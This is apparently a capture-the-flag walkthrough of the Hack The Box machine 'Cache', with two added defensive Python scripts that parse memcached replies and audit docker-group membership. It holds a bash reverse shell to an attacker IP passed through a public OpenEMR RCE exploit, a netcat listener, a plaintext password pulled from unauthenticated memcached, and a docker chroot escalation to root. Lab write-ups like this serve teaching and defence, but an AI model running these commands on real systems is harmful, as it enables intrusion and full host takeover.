Cache is a Linux box with IP address 10.10.10.188. Let's start with an nmap scan and some enumeration.

#nmap

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:2d:b2:a0:c4:57:e7:7c:35:2d:45:4d:db:80:8c:f1 (RSA)
| 256 bc:e4:16:3d:2a:59:a1:3a:6a:09:28:dd:36:10:38:08 (ECDSA)
|_ 256 57:d5:47:ee:07:ca:3a:c0:fd:9b:a8:7f:6b:4c:9d:7c (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 6CE8D3334381134EB0A89D8FECE6EEB2
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: OpenEMR Login
|_Requested resource was interface/login/login.php?site=default
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Visiting the web service on port 80, we found a js file containing a username and password. After logging in we got nothing; after some time we found a hint about "hms", so we added hms.htb to the hosts file. And what we found there was OpenEMR.

Exploit: https://www.exploit-db.com/exploits/45161

$ python openemr_rce.py http://hms.htb -u openemr_admin -p xxxxxx -c 'bash -i >& /dev/tcp/10.10.15.185/1337 0>&1'

Listen with nc and we are in the system. 🙂

#user flag

Use python to spawn a tty: python3 -c 'import pty; pty.spawn("/bin/sh")'

$ nc -lvp 1337
listening on [any] 1337 …
connect to [10.10.15.185] from hms.htb [10.10.10.188] 41960
bash: cannot set terminal process group (2086): Inappropriate ioctl for device
bash: no job control in this shell
www-data@cache:/var/www/hms.htb/public_html/interface/main$

Found two users; one of them, ash, has the credentials from the js file, and with them we got user.txt.

$ cd /home
$ ls
ash luffy
$ su ash
Password:
ash@cache:/home$ ls
ash luffy
ash@cache:/home$ cd ash
ash@cache:~$ ls
Desktop Documents Downloads Music Pictures Public user.txt
ash@cache:~$ cat user.txt
ba3ad6c2fb35d648301680f2b2b8dc34

After some time we found a service listening on port 11211 (local only), which we can reach with telnet.

ash@cache:~$ ss -tnl
ss -tnl
State Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0 128 127.0.0.53%lo:53 0.0.0.0:*
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
LISTEN 0 128 127.0.0.1:11211 0.0.0.0:*
LISTEN 0 128 *:80 *:*
LISTEN 0 128 [::]:22 [::]:*

First connect via telnet and get passwd; we got luffy : 0n3_p1ec3

ash@cache:~$ telnet localhost 11211
telnet localhost 11211
Trying ::1…
Trying 127.0.0.1…
Connected to localhost.
Escape character is '^]'.
get passwd
VALUE passwd 0 9
0n3_p1ec3
END
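The VALUE / END framing above is the memcached text protocol: the daemon on 11211 has no authentication, so any local user can read whatever the application cached, here a plaintext password. The following parser is an added example, not code from the original post: it parses a get reply by the byte count in each VALUE header (so a value containing CRLF is not split on line breaks), rejects truncated replies, and flags keys whose names look like credentials, which is the check a defender would run against their own cache. The sample reply and the key-name heuristic are constructed for the example.

```python
import re

# Constructed sample reply, modelled on the "get passwd" exchange above: two
# keys, the second containing an embedded CRLF to show why the byte count in
# the VALUE header, not line splitting, must delimit the payload.
SAMPLE_REPLY = (
    b"VALUE passwd 0 9\r\n"
    b"0n3_p1ec3\r\n"
    b"VALUE note 0 12\r\n"
    b"line1\r\nline2\r\n"
    b"END\r\n"
)

# Key names that commonly hold secrets; a heuristic for the audit, not a rule.
SECRET_KEY_PATTERN = re.compile(r"pass|pwd|secret|token|api[_-]?key|cred", re.I)

# 'VALUE <key> <flags> <bytes> [<cas unique>]'
VALUE_HEADER = re.compile(rb"VALUE (\S+) (\d+) (\d+)(?: (\d+))?")


def parse_get_reply(data: bytes) -> dict:
    r"""Parse a memcached text-protocol 'get' reply into {key: (flags, value)}.

    Format: one or more 'VALUE <key> <flags> <bytes>[ <cas>]\r\n' headers, each
    followed by exactly <bytes> bytes of payload and '\r\n', then 'END\r\n'.
    Raises ValueError on a truncated or malformed reply.
    """
    items = {}
    pos = 0
    while True:
        eol = data.find(b"\r\n", pos)
        if eol == -1:
            raise ValueError("truncated reply: missing line terminator")
        line = data[pos:eol]
        pos = eol + 2
        if line == b"END":
            return items
        m = VALUE_HEADER.fullmatch(line)
        if m is None:
            raise ValueError(f"unexpected line: {line!r}")
        key = m.group(1).decode()
        flags, length = int(m.group(2)), int(m.group(3))
        payload = data[pos:pos + length]
        # The payload must be exactly <bytes> long and be followed by CRLF.
        if len(payload) != length or data[pos + length:pos + length + 2] != b"\r\n":
            raise ValueError(f"truncated payload for key {key!r}")
        items[key] = (flags, payload)
        pos += length + 2


def secret_like_keys(items: dict) -> list:
    """Return, sorted, the keys whose names suggest they hold credentials."""
    return sorted(k for k in items if SECRET_KEY_PATTERN.search(k))


if __name__ == "__main__":
    parsed = parse_get_reply(SAMPLE_REPLY)
    for key, (flags, value) in parsed.items():
        print(f"{key}: flags={flags} bytes={len(value)}")
    print("keys that look like secrets:", secret_like_keys(parsed))
```

On a real host you would feed the parser the bytes read from a socket to 127.0.0.1:11211; the point of the audit is that anything stored there is readable by every local account, so secrets do not belong in the cache at all, and the service should stay bound to loopback as it is here.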

#root flag

After logging into the luffy account, we got priv esc through docker: docker run -v /:/mnt --rm -it ubuntu chroot /mnt sh

luffy@cache:~$ docker run -v /:/mnt --rm -it ubuntu chroot /mnt sh
docker run -v /:/mnt --rm -it ubuntu chroot /mnt sh
#id
uid=0(root) gid=0(root) groups=0(root)
#ls
bin home lib64 opt sbin sys vmlinuz
boot initrd.img lost+found proc snap tmp vmlinuz.old
dev initrd.img.old media root srv usr
etc lib mnt run swap.img var
#cd root
#ls
root.txt
#cat root.txt
13075205f94778ab0de9e50946e11c7e
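The docker command above works because the account can talk to the Docker daemon, which runs as root and will happily bind-mount the host's / into a container: being allowed to run docker is equivalent to being root. The audit below is an added example, not code from the original post; it parses /etc/group and /etc/passwd (the contents here are constructed samples standing in for the real files) and reports every non-root user who is a member of a root-equivalent group, counting primary-group membership from the passwd gid field, which a check of /etc/group alone would miss.

```python
# Constructed samples standing in for /etc/group and /etc/passwd on a host
# like the one above; on a real system read the files from disk instead.
SAMPLE_GROUP = """\
root:x:0:
sudo:x:27:ash
docker:x:999:luffy
lxd:x:108:
users:x:100:ash,luffy
# comment lines and blank lines are skipped

"""

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
ash:x:1000:1000::/home/ash:/bin/bash
luffy:x:1001:1001::/home/luffy:/bin/bash
"""

# Membership in any of these is root-equivalent: docker and lxd can mount the
# host filesystem into a container (as the docker run above shows), disk can
# read and write block devices directly.
ROOT_EQUIVALENT_GROUPS = ("docker", "lxd", "disk")


def parse_group(text: str) -> dict:
    """Map group name -> (gid, set of supplementary members)."""
    groups = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        name, _pw, gid, members = line.split(":", 3)
        groups[name] = (int(gid), {m for m in members.split(",") if m})
    return groups


def parse_passwd(text: str) -> dict:
    """Map user name -> primary gid (fourth field of /etc/passwd)."""
    users = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        users[fields[0]] = int(fields[3])
    return users


def root_equivalent_members(group_text: str, passwd_text: str) -> dict:
    """Return {group: sorted non-root users} for each root-equivalent group
    that has members, combining supplementary membership (/etc/group) with
    primary-group membership (the gid field of /etc/passwd)."""
    groups = parse_group(group_text)
    users = parse_passwd(passwd_text)
    findings = {}
    for gname in ROOT_EQUIVALENT_GROUPS:
        if gname not in groups:
            continue
        gid, members = groups[gname]
        members = set(members) | {u for u, pg in users.items() if pg == gid}
        members.discard("root")
        if members:
            findings[gname] = sorted(members)
    return findings


if __name__ == "__main__":
    for gname, members in root_equivalent_members(SAMPLE_GROUP, SAMPLE_PASSWD).items():
        print(f"{gname}: {', '.join(members)} (effectively root)")
```

Run against the sample data it reports luffy in docker. The fix on a real host is to take the account out of the docker group and, if it genuinely needs to build or run containers, use rootless Docker or a sudo rule restricted to specific images rather than unrestricted daemon access.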
